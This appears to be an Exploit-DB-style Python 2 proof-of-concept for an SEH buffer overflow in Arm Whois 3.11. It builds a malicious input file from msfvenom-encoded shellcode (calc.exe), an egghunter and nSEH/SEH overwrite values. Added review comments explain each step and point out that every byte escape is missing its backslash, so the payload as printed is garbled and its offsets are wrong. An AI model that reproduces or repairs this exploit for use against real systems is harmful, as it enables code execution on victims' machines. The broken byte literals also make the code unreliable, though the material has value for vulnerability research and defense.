# Exploit Title: Arm Whois 3.11 - Buffer Overflow (ASLR)
# Google Dork: [if applicable]
# Date: 23/11/2018
# Exploit Author: zephyr
# Vendor Homepage: http://www.armcode.com
# Software Link: http://www.armcode.com/downloads/arm-whois.exe
# Version: 3.11
# Tested on: Windows Vista Ultimate SP1 x86 unpatched
# CVE :

# nSEH @ 672 on Windows Vista Ultimate SP1 unpatched
# msfvenom -p windows/exec cmd=calc.exe -e x86/shikata_ga_nai -a x86 --platform windows
# Builds the overflow input for the Arm Whois 3.11 SEH overwrite described in
# the header and writes it to tmp.txt in the current directory; nothing in
# this script contacts the target program itself.
# Python 2 syntax throughout: the bare `print` statement on the last line is a
# SyntaxError on Python 3, and writing a str to a file opened 'wb' raises
# TypeError there.
# NOTE(review): every byte escape below is written as "x90", "xba", ... with
# no backslash, so as this file stands each token is three plain ASCII
# characters rather than one byte, and every length/offset computed from these
# literals is off by that factor (looks like an extraction artifact).
nops = "x90"*20  # 20 repetitions of the NOP token
# Egg-hunter tag "w00tw00t", NOP padding, then the encoded payload; per the
# msfvenom line above this is intended as windows/exec cmd=calc.exe encoded
# with x86/shikata_ga_nai.
buf = "w00tw00t" + nops + ("xbax0exc3xc8xe6xddxc4xd9x74x24xf4x5ex29"
"xc9xb1x31x83xc6x04x31x56x0fx03x56x01x21"
"x3dx1axf5x27xbexe3x05x48x36x06x34x48x2c"
"x42x66x78x26x06x8axf3x6axb3x19x71xa3xb4"
"xaax3cx95xfbx2bx6cxe5x9axafx6fx3ax7dx8e"
"xbfx4fx7cxd7xa2xa2x2cx80xa9x11xc1xa5xe4"
"xa9x6axf5xe9xa9x8fx4dx0bx9bx01xc6x52x3b"
"xa3x0bxefx72xbbx48xcaxcdx30xbaxa0xcfx90"
"xf3x49x63xddx3cxb8x7dx19xfax23x08x53xf9"
"xdex0bxa0x80x04x99x33x22xcex39x98xd3x03"
"xdfx6bxdfxe8xabx34xc3xefx78x4fxffx64x7f"
"x80x76x3exa4x04xd3xe4xc5x1dxb9x4bxf9x7e"
"x62x33x5fxf4x8ex20xd2x57xc4xb7x60xe2xaa"
"xb8x7axedx9axd0x4bx66x75xa6x53xadx32x02"
"x6exacx19x3bxd7xa4x1cx26xe8x12x62x5fx6b"
"x97x1axa4x73xd2x1fxe0x33x0ex6dx79xd6x30"
"xc2x7axf3x52x85xe8x9fxbax20x89x3axc3")

# NOP padding, a 32-token egghunter stub, then 15 more NOP tokens. The stub
# literal contains x77x30x30x74 (ASCII "w00t"), presumably the tag it scans
# for, which matches the "w00tw00t" prefix on buf.
egghunter = nops + ("x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x77x30x30x74x8bxfaxafx75xeaxafx75xe7xffxe7") + "x90"*15
# Filler up to the nSEH offset of 672 noted above. "A" * (negative) is "" in
# Python, so if buf+egghunter ever exceeds 672 characters the filler silently
# disappears instead of raising, and the layout below is wrong without any
# error.
junk = "A"*(672-len(buf+egghunter))
# nSEH and SEH overwrite values; the SEH value is given as three tokens here.
# This is the SEH-overwrite technique that SafeSEH/SEHOP are designed to stop;
# the header records it as tested only on an unpatched Vista SP1 x86 build.
nseh = "xebxc7x90x90"
seh = "x57x22x41"

# Final layout: filler, tag + payload, egghunter, nSEH, SEH.
payload = junk + buf + egghunter + nseh + seh

# Written without a context manager: an exception between open() and close()
# would leave the handle open until the interpreter exits.
f = open("tmp.txt", 'wb')
f.write(payload)
f.close()
# Python 2 print statement; reports the character count of what was written.
print len(payload)